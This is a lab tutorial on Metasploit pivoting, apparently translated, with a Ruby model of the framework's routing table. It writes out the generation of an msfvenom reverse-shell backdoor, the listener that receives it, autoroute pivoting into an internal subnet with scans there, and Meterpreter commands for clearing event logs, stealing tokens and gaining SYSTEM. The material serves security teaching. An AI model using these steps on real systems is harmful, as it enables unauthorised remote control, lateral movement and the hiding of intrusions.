
Intranet Security: Metasploit Pivoting by Adding Routes

Disclaimer:

These notes are written solely to improve security knowledge and to share it with more people. Do not use the techniques in these notes for illegal activity; the author bears no responsibility for any consequences of misusing them. Maintaining network security is everyone's responsibility; let us jointly keep the network civil and harmonious.

Metasploit Pivoting: Adding Routes

  • 1 Metasploit Pivoting by Adding Routes: How It Works
  • 2 Lab Environment
    • 2.1 Establish a Meterpreter reverse connection
    • 2.2 Check the current system's information
    • 2.3 Use the added route to scan hosts on the new subnet
  • 3 Basic Meterpreter commands

1 Metasploit Pivoting by Adding Routes: How It Works

  • Pivoting through network-layer reachability: the compromised host (the Meterpreter session) has an interface on a subnet that Kali cannot reach. Adding a route in Metasploit tells the framework that sockets for that subnet must be tunnelled through the session instead of Kali's own network stack, so the compromised host forwards the traffic on the attacker's behalf.
  • Only sockets opened inside the framework (scanner and exploit modules, or a SOCKS proxy served by auxiliary/server/socks_proxy) use these routes; external programs such as nmap keep using the operating system's routing table unless they are proxied through Metasploit.
  • Drawback: every probe is a real connection from the pivot host to the target, so the traffic is easily blocked (or logged) by firewalls between them.

2 Lab Environment

(Lab topology diagram not preserved. Inferred from the commands below: Kali is at 192.168.0.2, the Web Server is dual-homed with one interface on 192.168.0.0/24 and one on 10.2.1.0/24, and 10.2.1.0/24 is the target subnet that Kali cannot reach directly.)

2.1 Establish a Meterpreter reverse connection

  1. Generate the Metasploit backdoor program (written into Kali's web root so the Web Server can download it)
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe

  2. Configure the listener on Kali for the Meterpreter reverse connection (lport is left at its default of 4444, which matches the payload generated above)
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.2
    run

  3. On the Web Server, download the Metasploit backdoor program and run it
  4. The Meterpreter reverse connection is established successfully

2.2 Check the current system's information

  1. Check the current system's routing information; a new subnet, 10.2.1.0/24, is found (the Web Server is dual-homed: one interface on 192.168.0.0/24 facing Kali, one on 10.2.1.0/24 that Kali has no route to):

    ipconfig
    route list

  2. Add a route to that target subnet. With no options, post/multi/manage/autoroute runs with CMD=autoadd, which adds a framework route for every subnet the session's host has an interface in; run autoroute -p is the print command of the older (deprecated) Meterpreter script, and the same listing is available with run post/multi/manage/autoroute CMD=print, or with route print at the msfconsole prompt after backgrounding the session.
    run post/multi/manage/autoroute
    run autoroute -p

    Check the added route: the gateway (next hop) for 10.2.1.0/24 is Session 1, that is, the Meterpreter session on the Web Server. This route exists only inside the framework, not in Kali's operating-system routing table.

2.3 Use the added route to scan hosts on the new subnet

  • Scan with the MSF port scanner module. Because the module opens its sockets through the framework, each connection to 10.2.1.x is relayed through session 1 and appears to the targets as coming from the Web Server:
    use auxiliary/scanner/portscan/tcp
    set ports 135,139,445,23,80,8080
    set rhosts 10.2.1.1-10.2.1.3
    run
  • Nmap scan: the result shows ports 23 and 80 on 10.2.1.3 as filtered.
    db_nmap -sV -p23,80 10.2.1.3
    A firewall is one explanation, but note that db_nmap only launches the external nmap binary on Kali. Nmap uses the operating system's routing table and knows nothing about the routes added with autoroute, so this scan never traverses the pivot, and "filtered" is the expected result whether or not 10.2.1.3 runs a firewall. To send nmap (or any other external tool) through the session, start auxiliary/server/socks_proxy in msfconsole, which does consult the framework's routes, point proxychains at it, and use a TCP connect scan with host discovery disabled (nmap -sT -Pn), because a SOCKS proxy cannot carry raw SYN or ICMP probes.
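The routing model behind section 1 and the db_nmap caveat in section 2.3, as an added example that is not Metasploit's own code: a small Ruby reimplementation of the idea behind Rex::Socket::SwitchBoard, the table that route add and autoroute fill. Sockets opened by framework modules (and by the SOCKS server) are looked up here by longest-prefix match and, on a hit, tunnelled through the matching session; an external process such as the nmap launched by db_nmap never consults it. The class name SwitchBoard, the resolve helper with its origin: symbols, and the second session id and subnet are assumptions chosen to mirror the lab on this page.

```ruby
require "ipaddr"

# Added example (not Metasploit's code): a minimal model of the framework's
# routing table (the real one is Rex::Socket::SwitchBoard). Each entry maps a
# destination network to the session whose host forwards traffic for it.
Route = Struct.new(:network, :prefix_len, :session)

class SwitchBoard
  def initialize
    @routes = {}   # "10.2.1.0/24" => Route
  end

  # What `route add 10.2.1.0/24 1` or autoroute's autoadd does: register a
  # subnet as reachable via a session. A later entry for the same subnet
  # replaces the earlier one.
  def add_route(cidr, session)
    net, plen = parse(cidr)
    @routes["#{net}/#{plen}"] = Route.new(net, plen, session)
    self
  end

  # `route remove 10.2.1.0/24 1`: drop the entry for a subnet.
  def remove_route(cidr)
    net, plen = parse(cidr)
    @routes.delete("#{net}/#{plen}")
    self
  end

  # Longest-prefix match, exactly as a router would do it. Returns the session
  # id to tunnel through, or nil when the framework should use Kali's own
  # network stack (the direct path).
  def session_for(dest)
    ip = IPAddr.new(dest)
    best = @routes.values.select { |r| r.network.include?(ip) }.max_by(&:prefix_len)
    best && best.session
  end

  # Listing in the shape of `route print`: [subnet/prefix, gateway].
  def print_routes
    @routes.values.map { |r| ["#{r.network}/#{r.prefix_len}", "Session #{r.session}"] }
  end

  private

  # IPv4 only, to keep the example short. IPAddr masks the host bits for us,
  # so "10.2.1.3/24" is stored as 10.2.1.0/24.
  def parse(cidr)
    _addr, plen = cidr.split("/", 2)
    net = IPAddr.new(cidr)
    raise ArgumentError, "IPv4 only: #{cidr}" unless net.ipv4?
    [net, (plen || 32).to_i]
  end
end

# Who actually consults the table. Sockets created inside the framework
# (auxiliary/scanner/portscan/tcp, auxiliary/server/socks_proxy, exploit
# modules) go through it; an external process such as the nmap binary
# launched by db_nmap uses the OS routing table and never sees these entries.
# The origin: symbols are an assumption of this example.
def resolve(board, dest, origin:)
  case origin
  when :framework_module, :socks_proxy
    sid = board.session_for(dest)
    sid ? "session #{sid}" : "local stack"
  when :external_process
    "local stack"
  else
    raise ArgumentError, "unknown origin #{origin.inspect}"
  end
end

if __FILE__ == $PROGRAM_NAME
  board = SwitchBoard.new
  board.add_route("10.2.1.0/24", 1)   # what autoroute added in section 2.2
  board.add_route("10.0.0.0/8", 2)    # a broader route via a second, assumed session

  board.print_routes.each { |subnet, gw| puts "#{subnet} -> #{gw}" }
  puts resolve(board, "10.2.1.3",    origin: :framework_module)  # session 1: the more specific route wins
  puts resolve(board, "10.9.9.9",    origin: :framework_module)  # session 2
  puts resolve(board, "192.168.0.5", origin: :framework_module)  # local stack: no route, Kali connects directly
  puts resolve(board, "10.2.1.3",    origin: :external_process)  # local stack: the db_nmap case
end
```

The origin distinction is the whole point of the db_nmap observation above: the portscan module and the SOCKS server ask the switchboard and get "session 1", while a process started outside the framework gets the local stack no matter what routes exist.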

3 Basic Meterpreter commands

The listing below is taken from the help output of a Meterpreter session, with the author's notes on the most-used commands translated in parentheses. migrate is a core command and getsystem belongs to the priv extension; both are appended to the System Commands list here for convenience.

Stdapi: Networking Commands
===========================
Command       Description
-------       -----------
arp           Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat       Display the network connections
portfwd       Forward a local port to a remote service
resolve       Resolve a set of host names on the target
route         View and modify the routing table

Stdapi: System Commands
=======================
Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process (enables privileges the current token already holds; this is not a privilege escalation)
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as (check the current user)
kill          Terminate a process
localtime     Displays the target system local date and time
pgrep         Filter processes by name
pkill         Terminate processes by name
ps            List running processes (list processes)
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS (view system information)
migrate       Migrate the server to another process (move Meterpreter into another process, e.g. to survive the original binary exiting)
getsystem     Attempt to elevate your privilege to that of local system. (tries several local techniques, such as named-pipe impersonation, to obtain SYSTEM)